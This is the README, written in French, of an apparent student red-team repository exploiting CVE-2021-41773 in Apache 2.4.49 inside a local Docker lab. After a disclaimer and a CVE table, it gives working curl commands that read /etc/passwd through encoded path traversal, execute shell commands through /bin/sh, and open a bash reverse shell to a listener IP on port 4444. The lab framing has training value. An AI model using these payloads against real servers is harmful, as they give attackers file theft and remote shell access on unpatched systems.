
Apache 2.4.49 Traversée de chemin RCE
Département Cybersécurité ITSOLERA — Tâche Red Team n°3
Équipe : Offensive Team Zeta
Date : 18 mars 2026
Ce dépôt est uniquement à des fins éducatives.
Tous les tests ont été effectués dans un laboratoire Docker local isolé.
Ne l'utilisez jamais contre des systèmes réels, en production ou appartenant à des tiers.
| Champ | Détail |
|---|
| Identifiant CVE | CVE-2021-41773 |
| Score CVSS | 9.8 CRITIQUE |
| Version concernée | Serveur HTTP Apache 2.4.49 UNIQUEMENT |
| Type | Traversée de chemin + Exécution de code à distance |
| Corrigé dans | Apache 2.4.51 |
| Fichier | Description |
|---|---|
poc_41773.py | Script d'exploitation PoC en Python avec bannière Team Zeta |
docker-compose.yml | Configuration de l'environnement de laboratoire vulnérable |
offensive_zeta_shell.txt | Journal de session en direct — preuve de l'exploitation |
screenshots/ | Captures d'écran de preuve |
Offensive_Team_Zeta_FINAL_Report.pdf | Rapport complet d'exploitation |
# Pull the vulnerable image
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
# Start the lab
docker-compose up -d
# Verify Apache 2.4.49 is running
curl -I http://localhost:8080/
# Must show: Server: Apache/2.4.49
# File read via path traversal
curl --path-as-is \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
# Remote code execution
curl --path-as-is \
-d 'echo Content-Type: text/plain; echo; id' \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
# Reverse shell (replace IP with your machine IP)
curl --path-as-is \
-d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
"http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"